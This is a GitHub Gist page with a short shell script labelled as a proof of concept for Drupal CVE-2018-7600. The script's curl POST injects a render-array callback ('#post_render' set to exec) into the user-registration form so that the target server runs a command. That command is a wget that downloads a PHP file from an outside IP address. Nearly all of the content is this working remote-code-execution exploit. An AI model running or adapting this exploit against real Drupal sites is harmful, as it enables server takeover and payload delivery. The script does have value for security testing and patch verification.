Instantly share code, notes, and snippets.

Embed
What would you like to do?
Drupal CVE-2018-7600 PoC
#!/bin/sh
# https://github.com/a2u/CVE-2018-7600/issues/2
HOST="http://drupal.docker.localhost:8000"
PHP_FUNCTION="exec"
PHP_ARG="wget http://172.16.30.108:6969/foob.php"
curl -X POST \
"$HOST/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" \
-F form_id=user_register_form \
-F _drupal_ajax=1 \
-F "mail[#post_render][]=$PHP_FUNCTION" \
-F 'mail[#type]=markup' \
-F "mail[#markup]=$PHP_ARG"
@AlbinoDrought

This comment has been minimized.

Copy link
Owner

AlbinoDrought commented Apr 12, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment